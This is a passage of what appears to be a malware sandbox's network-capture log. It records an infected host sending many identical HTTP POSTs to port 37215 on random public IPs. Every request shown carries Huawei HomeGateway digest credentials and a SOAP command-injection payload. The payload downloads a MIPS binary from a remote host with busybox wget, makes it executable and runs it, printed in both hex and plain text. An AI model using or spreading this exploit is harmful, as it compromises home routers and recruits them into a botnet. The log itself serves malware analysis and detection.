2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          851192.168.2.1533956157.248.129.20937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:54.655828953 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          852192.168.2.156008041.126.201.21037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:54.655853033 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          853192.168.2.1553630218.53.7.8937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:54.655898094 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          854192.168.2.1552810126.120.205.7537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:54.656187057 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          855192.168.2.1548712137.249.194.24137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:54.656212091 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          856192.168.2.154279241.78.228.15037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:54.656464100 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          857192.168.2.154510641.246.209.9837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:54.657272100 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          858192.168.2.1547290197.123.56.15337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:54.657303095 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          859192.168.2.1535834202.123.77.4437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:54.657318115 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          860192.168.2.1547088157.240.30.25237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:54.657356024 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          861192.168.2.1544810157.179.161.1537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:54.658576012 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
